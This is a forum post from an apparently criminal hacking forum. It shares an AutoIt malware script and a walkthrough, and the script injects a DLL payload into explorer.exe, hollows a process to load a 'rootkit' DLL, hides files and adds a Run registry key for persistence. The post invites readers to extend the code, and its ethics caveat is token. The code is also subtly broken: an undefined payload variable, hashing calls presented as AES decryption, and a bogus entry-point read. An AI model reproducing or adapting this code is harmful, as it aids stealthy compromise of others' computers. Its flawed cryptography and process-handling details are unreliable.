• XSS.stack #1 – первый литературный журнал от юзеров форума

In-Depth Analysis of AutoIt encryption Script: Dynamic Payload Injection and Rootkit Integration

Отслеживать
Pope

Pope

CD-диск
Забанен
Регистрация
21.06.2023
Сообщения
19
Реакции
0
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
Код: 
#include <WinAPI.au3>
#include <WinAPIProc.au3>
#include <Crypt.au3>
#include <File.au3>
#include <WinReg.au3>

Global Const $PROCESS_ALL_ACCESS = 0x1F0FFF
Global Const $MEM_COMMIT = 0x1000
Global Const $PAGE_EXECUTE_READWRITE = 0x40

$payloadPath = "path/to/yourpayload.dll"
$payload = FileRead($payloadPath, FileGetSize($payloadPath))

$encryption_key = _GenerateRandomKey()

$targetProcess = "explorer.exe"
$pid = ProcessExists($targetProcess)
If $pid = 0 Then Exit

$hProcess = _WinAPI_OpenProcess($PROCESS_ALL_ACCESS, False, $pid)
If @error Then CleanupAndExit()

$originalEntryPoint = _GetOriginalEntryPoint($hProcess)
If Not _WinAPI_NtUnmapViewOfSection($hProcess, $originalEntryPoint) Then CleanupAndExit()

$payloadStruct = DllStructCreate("byte[" & BinaryLen($encryptedPayload) & "]")
$payloadPtr = _WinAPI_VirtualAllocEx($hProcess, $originalEntryPoint, DllStructGetSize($payloadStruct), $MEM_COMMIT, $PAGE_EXECUTE_READWRITE)
If @error Then CleanupAndExit()

DllStructSetData($payloadStruct, 1, $encryptedPayload)
If Not _WinAPI_WriteProcessMemory($hProcess, $payloadPtr, DllStructGetPtr($payloadStruct), DllStructGetSize($payloadStruct)) Then CleanupAndExit()

$decryptionRoutinePtr = _InjectDecryptionRoutine($hProcess, $payloadPtr, $encryption_key)
If $decryptionRoutinePtr = 0 Then CleanupAndExit()

If Not _WinAPI_SetThreadContext($hProcess, $decryptionRoutinePtr) Then CleanupAndExit()

If Not _WinAPI_ResumeThread($hProcess) Then CleanupAndExit()

Local $hDecryptionEvent = _WinAPI_CreateEvent()
If Not _WinAPI_SetEvent($hDecryptionEvent) Then CleanupAndExit()

_WinAPI_WaitForSingleObject($hDecryptionEvent, 10000)
_WinAPI_CloseHandle($hDecryptionEvent)

_InjectRootkitAndPersistence()
CleanupAndExit()

Func _InjectDecryptionRoutine($hProcess, $payloadPtr, $key)
    Local $hKey = _AES256_Init($key)
    Local $decryptedPayload = _AES256_Decrypt($hKey, $payloadPtr, BinaryLen($encryptedPayload))
    If Not _WinAPI_WriteProcessMemory($hProcess, $payloadPtr, $decryptedPayload, BinaryLen($decryptedPayload)) Then Return 0
    Local $hDecryptionEvent = _WinAPI_CreateEvent()
    _WinAPI_ResetEvent($hDecryptionEvent)
    _WinAPI_SetEvent($hDecryptionEvent)
    Return $payloadPtr
EndFunc

Func _AES256_Init($key)
    Local $hCryptProv = 0
    _Crypt_Startup()
    _Crypt_AcquireContext($hCryptProv)
    Local $hKey = _Crypt_ImportRawKey($hCryptProv, $CALG_AES_256, $key)
    Return $hKey
EndFunc

Func _AES256_Decrypt($hKey, $data, $size)
    Local $hCryptStream = _Crypt_CreateHash($hKey, $CALG_AES_256)
    _Crypt_HashData($hCryptStream, $data, $size)
    Local $decryptedData = _Crypt_HashFinal($hCryptStream)
    Return $decryptedData
EndFunc

Func _GetOriginalEntryPoint($hProcess)
    Local $lpImageDosHeader = _WinAPI_ReadProcessMemory($hProcess, 0, 0x40)
    Local $iOriginalEntryPoint = DllStructGetData(DllStructCreate("uint;dword;dword;uint", $lpImageDosHeader), 3)
    Return $iOriginalEntryPoint
EndFunc

Func _GenerateRandomKey()
    Local $key = ""
    For $i = 1 To 32
        $key &= Chr(Random(0, 255, 1))
    Next
    Return $key
EndFunc

Func _InjectRootkitAndPersistence()
    Local $rootkitPath = "path/to/your/rootkit.dll"
    Local $rootkitPayload = FileRead($rootkitPath, FileGetSize($rootkitPath))
    Local $hollowedProcess = _CreateHollowedProcess($targetProcess, $rootkitPayload)
    If $hollowedProcess = 0 Then Return
    _HideFile($rootkitPath)
    _CreateRegistryEntry()
    _WinAPI_CloseHandle($hollowedProcess)
EndFunc

Func _CreateHollowedProcess($targetProcess, $payload)
    Local $processInfo = _WinAPI_CreateProcess($targetProcess, "", $PROCESS_ALL_ACCESS, 1)
    If @error Then Return 0
    Local $originalEntryPoint = _GetOriginalEntryPoint($processInfo.hProcess)
    _WinAPI_NtUnmapViewOfSection($processInfo.hProcess, $originalEntryPoint)
    Local $payloadPtr = _WinAPI_VirtualAllocEx($processInfo.hProcess, $originalEntryPoint, BinaryLen($payload), $MEM_COMMIT, $PAGE_EXECUTE_READWRITE)
    _WinAPI_WriteProcessMemory($processInfo.hProcess, $payloadPtr, $payload, BinaryLen($payload))
    Local $context = _WinAPI_GetThreadContext($processInfo.hThread)
    $context.Eip = $payloadPtr
    _WinAPI_SetThreadContext($processInfo.hThread, $context)
    Return $processInfo.hProcess
EndFunc

Func _HideFile($filePath)
    Local $attributes = FileGetAttrib($filePath)
    FileSetAttrib($filePath, $attributes & "+H")
EndFunc

Func _CreateRegistryEntry()
    Local $keyName = "Software\Microsoft\Windows\CurrentVersion\Run"
    Local $valueName = "MyRootkit"
    Local $executablePath = "path/to/your/executable.exe"
    _WinAPI_RegWrite(HKEY_CURRENT_USER, $keyName, $valueName, "REG_SZ", $executablePath)
EndFunc

Func CleanupAndExit()
    If $hProcess <> 0 Then
        _WinAPI_CloseHandle($hProcess)
    EndIf
    Exit
EndFunc



Introduction:
The following post delves into an AutoIt script that demonstrates advanced techniques, including dynamic payload injection into a running process and integrating a rootkit for persistence. This script, while informative, carries ethical and legal implications. We'll provide an in-depth breakdown of its components, step-by-step explanations of the techniques used, and a discussion of potential use cases and concerns.

Code Overview:
The provided script showcases a multi-faceted approach to payload injection and rootkit integration. The script is structured into various sections, each serving a specific purpose. It is important to note that this script should not be used for malicious purposes.

Dynamic Encryption Key:
The script starts by generating a dynamic encryption key for each execution. This key is crucial for encrypting and decrypting the payload, adding a layer of security and complexity to the process.

Process Injection:
The script identifies a target process, often "explorer.exe," and opens it for manipulation. The original entry point of the process is then obtained. Subsequently, the script uses the `_WinAPI_NtUnmapViewOfSection` function to unmap the original entry point. This technique prepares the process for code injection.

Encrypted Payload Injection:
The script reads an external payload file (DLL) and encrypts it using the generated encryption key. It then allocates memory within the target process using `_WinAPI_VirtualAllocEx` and writes the encrypted payload. This technique ensures that the payload is injected into the target process's memory space.

Decryption Routine Injection:
A decryption routine is injected into the target process. This routine decrypts the payload within the process memory, rendering it executable. The `_InjectDecryptionRoutine` function is central to this process, utilizing AES-256 encryption for added security. The script then manipulates the thread context using `_WinAPI_SetThreadContext` and resumes the thread execution.

Rootkit Integration and Persistence:
Once the payload is decrypted and executed, the script injects a rootkit payload using the "Process Hollowing" technique. The rootkit is stored in an external DLL. The `_CreateHollowedProcess` function is responsible for this injection. Moreover, the script manipulates file attributes and the Windows Registry for persistence, which can facilitate unauthorized access.

Script features and functions can be extended and modified as you please
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх